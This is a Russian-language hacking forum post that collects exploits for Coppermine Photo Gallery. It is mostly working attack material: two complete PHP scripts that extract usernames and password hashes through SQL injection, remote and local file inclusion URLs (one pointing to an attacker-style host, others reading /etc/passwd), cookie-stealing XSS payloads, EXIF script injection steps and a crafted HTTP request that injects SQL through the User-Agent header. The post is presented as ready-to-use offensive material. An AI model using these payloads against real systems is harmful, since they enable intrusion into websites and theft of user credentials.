|
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567
Репутация:
2145
|
|
[ Обзор уязвимостей Coppermine Photo Gallery ]
В данном обзоре я собрал уязвимости Coppermine Photo Gallery как самостоятельного скрипта, а не как модуля в различных CMS. Эти баги можно найти здесь:
https://forum.antichat.ru/showthread.php?t=59150
https://forum.antichat.ru/threadnav22857-1-10.html
Vendor: http://coppermine-gallery.net/
http://sourceforge.net/project/showfiles.php?group_id=89658
Multiple Remote File Include Vulnerabilities
Vulnerable: Coppermine Photo Gallery 1.4.10
Exploit:
Код:
http://www.example.com/Script_Path/image_processor.php?cmd=[Shell-Attack]
http://www.example.com/Script_Path/include/functions.php?path=[Shell-Attack]
http://www.example.com/Script_Path/include/picmgmt.inc.php?cmd=[Shell-Attack]
http://www.example.com/Script_Path/include/plugin_api.inc.php?path=[Shell-Attack]
http://www.example.com/Script_Path/index.php?path=[Shell-Attack]
http://www.example.com/Script_Path/pluginmgr.php?path=[Shell-Attack]
http://www.example.com/bridge/enigma/E2_header.inc.php?boarddir=http://evil_scripts?
ThumbNails.PHP SQL Injection Vulnerability
Vulnerable: Coppermine Photo Gallery 1.3.1
Exploit:
PHP код:
<?
# Coppermine Photo Gallery 1.3.x Blind SQL Injection Exploit
# by s0cratex, RTM Member
# Visit: www.zonartm.org
/*
You need make a small work... Add a fav pic, enter to the site and add
/addfav.php?pid=2 for example..xD
... in the line: if(eregi("download",fgets($cnx2))){ $pass.=chr($i);
echo chr($i); break; } }
the word "download" depends of the language...
*/
# saludos a rgod, OpTix, crypkey 'n mechas...
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
$host = "localhost"; $path = "/cpg"; $port = "80";
$id = "1";
echo "Coppermine Photo Gallery 1.3.x fav Blind SQL Injection Exploit\n";
echo "--------------------------------------------------------------\n";
echo "\n";
echo "Username -> ";
$j = 1; $user = "";
while(!strstr($user,chr(0))){
for($x=0;$x<255;$x++){
$xpl = "'') OR 1=(SELECT
(IF((ASCII(SUBSTRING(user_name,".$j.",1))=".$x."),1,0)) FROM
cpg131_users WHERE user_id=".$id.")/*";
$xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}";
$xpl = base64_encode($xpl);
$cnx = fsockopen($host,$port);
fwrite($cnx, "GET ".$path."/thumbnails.php?album=favpics
HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n");
while(!feof($cnx)){
if(eregi("download",fgets($cnx))){ $user.=chr($x); echo chr($x); break;
} }
fclose($cnx);
if ($x==255) {
die("\n Try again..."); }
}
$j++;
}
echo "\n";
echo "Password -> ";
$a = 1; $pass = "";
while(!strstr($pass,chr(0))){
for($i=0;$i<255;$i++){
$xpl = "'') OR 1=(SELECT
(IF((ASCII(SUBSTRING(user_password,".$a.",1))=".$i."),1,0)) FROM
cpg131_users WHERE user_id=".$id.")/*";
$xpl = "a:1:{i:0;s:".strlen($xpl).":\"".$xpl."\";}";
$xpl = base64_encode($xpl);
$cnx2 = fsockopen($host,$port);
fwrite($cnx2, "GET ".$path."/thumbnails.php?album=favpics
HTTP/1.0\r\nCookie: cpg131_fav=".$xpl."\r\n\r\n");
while(!feof($cnx2)){
if(eregi("download",fgets($cnx2))){ $pass.=chr($i); echo chr($i); break;
} }
fclose($cnx2);
if ($i==255) {
die("\n Try again..."); }
}
$a++;
}
echo "--------------------------------------------------------------\n";
echo "s0cratex@zonartm.org || if you speak spanish->MSN:
s0cratex@hotmail.com ..xD";
echo "www.zonartm.org/blog/s0cratex";
echo "plexinium.com comming soon <- Hacking Nica";
?>
Albmgr.PHP SQL Injection Vulnerability
Vulnerable: Coppermine Photo Gallery 1.4.10
Coppermine Photo Gallery 1.4.9
Coppermine Photo Gallery 1.4.4
Coppermine Photo Gallery 1.3.4
Coppermine Photo Gallery 1.3.3
Coppermine Photo Gallery 1.3.2
Coppermine Photo Gallery 1.3
Coppermine Photo Gallery 1.2.2 bNuke
Coppermine Photo Gallery 1.2.2 b
Coppermine Photo Gallery 1.2.1
Coppermine Photo Gallery 1.2
Coppermine Photo Gallery 1.1 beta 2
Coppermine Photo Gallery 1.1 .0
Coppermine Photo Gallery 1.0 RC3
Coppermine Photo Gallery 1.0
Exploit:
PHP код:
#!/usr/bin/php
<?php
/**
* This file require the PhpSploit class.
* If you want to use this class, the latest
* version can be downloaded from acid-root.new.fr.
**/
require("phpsploitclass.php");
if($argc < 4)
{
print
"\n---------------------------------------------------------";
print "\nAffected.scr..: Coppermine Photo Gallery <= 1.4.10";
print "\nPoc.ID........: 19070104";
print "\nType..........: SQL Injection";
print "\nRisk.level....: Medium";
print "\nSrc.download..: coppermine-gallery.net";
print "\nPoc.link......: acid-root.new.fr/poc/19070104.txt";
print "\nCredits.......: DarkFig";
print
"\n---------------------------------------------------------";
print "\nUsage.........: php xpl.php <url> <adminuser>
<adminpass>";
print "\nProxyOptions..: <proxhost:proxport>
<proxuser:proxpass>";
print "\nExample.......: php xpl.php http://c.com/ admin
passwd";
print
"\n---------------------------------------------------------\n";
exit(1);
}
/*/
[0] => xpl.php [1] => http://localhost/cpg1410/
[2] => root [3] => toor
[4] => localhost:8200 [5] => user:passwd
/*/
$url=$argv[1];$adu=$argv[2];
$adp=$argv[3];$pxs=$argv[4];
$pxa=$argv[5];
$xpl = new phpsploit();
$xpl->agent("InternetExploiter");
$xpl->cookiejar(1);
$xpl->allowredirection(1);
print "\nheader> ===============================================";
print "\nheader> Coppermine Photo Gallery 1.4.10 (SQL Injection)";
print "\nheader> ===============================================";
if(!empty($pxs)){
print "\nstatus> Using a proxy $pxs";
$xpl->proxy($pxs);
}
if(!empty($pxa)){
print "\nstatus> Basic proxy authentification $pxa";
$xpl->proxyauth($pxa);
}
/*/
Table prefix.
/*/
print "\nstatus> Searching the version";
$xpl->get($url.'include/index.html');
if(preg_match("#Coppermine version:
([0-9]*\.[0-9]*\.[0-9]*)#",$xpl->getcontent(),$matches)) print
"\nsploit> Coppermine version ".$matches[1];
else print "\nsploit> Not found";
$table = !empty($matches[1]) ?
'cpg'.str_replace('.','',$matches[1]).'_users' : 'cpg1410_users';
/*/
If you have the admin cookie (but not the password),
replace lines 73=>76 by $xpl->addcookie('yourcookie');
/*/
print "\nstatus> Trying to get logged in";
$xpl->post($url."login.php?referer=index.php","username=$adu&password=$adp&remember_me=1&submitted=Se+Connecter");
if(!preg_match("#color:red#",$xpl->getcontent())) print "\nsploit>
Done";
else die("\nstatus> Exploit failed\n");
/*/
(usermgr.php)
=============
case 'group_alb_access' :
if (isset($_GET['gid'])) $group_id = $_GET['gid'];
$sql = "SELECT group_name FROM [...] WHERE group_id = $group_id
[...]";
$result = cpg_db_query($sql);
(db_ecard.php)
==============
$start = isset($_REQUEST['start']) ? $_REQUEST['start'] : ''; [...]
if (!$start) {$startFrom = '0';}else{$startFrom=$start;} [...]
$result = cpg_db_query("SELECT [...] ORDER BY $sortBy $sortDirection
LIMIT $startFrom,$countTo");
(albmgr.php)
============
$cat = isset($_GET['cat']) ? ($_GET['cat']) : 0;
if ($cat == 1) $cat = 0;
if (GALLERY_ADMIN_MODE) {
$result = cpg_db_query("SELECT [...] WHERE category = $cat ORDER BY
pos ASC");
(filename_to_title())
=====================
$albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
$albstr = ($albumid) ? " WHERE aid = $albumid" : ''; [...]
$result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']}
$albstr");
(del_titles())
==============
$albumid = (isset($_POST['albumid'])) ? $_POST['albumid'] : 0;
$albstr = ($albumid) ? " WHERE aid = $albumid" : '';
$result = cpg_db_query("SELECT * FROM {$CONFIG['TABLE_PICTURES']}
$albstr");
/*/
print "\nstatus> Retrieving all members password";
$xpl->get($url."albmgr.php?cat=-1/**/union/**/select/**/user_name,user_password/**/from/**/$table/*");
if(preg_match_all("#<option
value=\"album_no=(.*),album_nm='([a-z0-9]{32})'#",$xpl->getcontent(),$matches))
print "\nsploit> Done";
else die("\nstatus> Exploit failed\n");
print "\nsploit> +----------------------------------+----------+";
print "\nsploit> | PASSWORD | USER |";
print "\nsploit> +----------------------------------+----------+";
/*/
(init.inc.php)
==============
$HTML_SUBST = array('&' => '&', '"' => '"', '<' => '<',
'>' => '>', '%26' => '&', '%22' => '"', '%3C' => '<',
'%3E' =>
'>','%27' => ''', "'" => ''');
[...]
if (is_array($_POST)) { // and GET, SERVER, REQUEST...
foreach ($_POST as $key => $value) {
if (!is_array($value))
$_POST[$key] = strtr(stripslashes($value), $HTML_SUBST);
if (!in_array($key, $keysToSkip) && isset($$key)) unset($$key);
}
... that's why we use the html_entity_decode() function.
I just wanted < for a remote php code execution sploit without admin
rights :'(.
When the admin view the security logs, it include
"security.log.php"...
(security.log.php)
==================
[...]
if (!defined('IN_COPPERMINE')) die(); ?>
Denied privileged access to viewlog.php from user Guest at on January
4, 2007, 2:10 pm
Failed login attempt with Username: <?php mail(you); [...]
fwrite(backdoor.php); [...] /* from IP 127.0.0.1 on Jan 04, 2007 at
01:16 PM
/*/
for($i=0;$i<count($matches[0]);$i++)
{
print "\nsploit> | ".$matches[2][$i].' |
'.html_entity_decode($matches[1][$i]);
if($i==(count($matches[0])-1)){
print "\nsploit>
+----------------------------------+----------+\n";
}
}
?>
Index.PHP Local File Include Vulnerability
Vulnerable: Coppermine Photo Gallery 1.4.4
Exploit:
Код:
http://www.example.com/cpg/index.php?file=.//././/././/././/././/././/././/././/././/./etc/passwd%00
Multiple File Include Vulnerabilities
Vulnerable: Coppermine Photo Gallery 1.4.3
Coppermine Photo Gallery 1.3.2
Coppermine Photo Gallery 1.3.1
Coppermine Photo Gallery 1.3
Coppermine Photo Gallery 1.2.1
Coppermine Photo Gallery 1.2
Coppermine Photo Gallery 1.1
Coppermine Photo Gallery 1.0
Exploit:
Код:
http://www.example.com/[path]/thumbnails.php?lang=../albums/userpics/10002/shell.zip%00
http://www.example.com/[path]/docs/showdoc.php?f=c:\boot.ini
http://www.example.com/[path]/docs/showdoc.php?f=\\192.168.1.2\c\shell.php cpg_143_incl_xpl
Picmgr.PHP SQL Injection Vulnerability
Vulnerable: Coppermine Photo Gallery 1.4.9
Exploit:
Код:
http://www.example.com/picmgr.php?aid=123%20UNION%20SELECT%20user_id,user_group,concat(user_name,char(58,58),user_password)%20FROM%20cpg149_users%20right%20join%20cpg149_usergroups%20on%20cpg149_users.user_group%20=%20cpg149_usergroups.group_id%20where%20cpg149_usergroups.has_admin_access%20=%201%20--
PHP Code Injection Vulnerability
Vulnerable: Coppermine Photo Gallery 1.0 RC3
Exploit:
Код:
http://www.example.com/albums/userpics/Copperminer.jpg.php?[command]
Remote Commands Execution
Vulnerable: Coppermine Photo Gallery <= 1.4.3
Exploit:
http://milw0rm.com/exploits/1511
File Retrieval SQL Injection
Vulnerable: Coppermine Photo Gallery <= 1.3.2
Exploit:
http://milw0rm.com/exploits/1317
Cross Site Scripting and Local File Inclusion
Vulnerable: Coppermine Photo Gallery <= 1.4.12
Exploit:
Код:
http://localhost/cpg/mode.php?admin_mode=1&referer=javascript:
alert(document.cookie)
http://localhost/cpg/viewlog.php?log=../../../../../../../../..
/etc/passwd%00
(требуются привилегии администратора)
EXIF Data Script Insertion
Vulnerable: Coppermine Photo Gallery >=1.3.3
Exploit:
Открываем картинку формата .jpg в любом графическом редакторе, который поддерживает работу с метаданными EXIF. Нам нужно изменить тэг модели камеры. Вписываем туда ядовитый код, к примеру:
Код:
<script>alert(for Antichat only)</script>
и сохраняем картинку.
Далее заливаем ее на сервер, находим в галерее и кликаем по ней мышью- отображается EXIF- информация, которая не фильтруется. То есть, вылетает алерт "for Antichat only"
addhit() function~ SQLinjection attack
Vulnerable: Coppermine Photo Gallery 1.4.8
Exploit:
Код:
GET /cpg/displayimage.php?album=random&cat=0&pos=-{Not Viewd Image ID} HTTP/1.1
Host: O_O
User-Agent: ’sql commands
Keep-Alive: 300
Cookie: valid login
Последний раз редактировалось iddqd; 01.02.2008 в 15:39..
|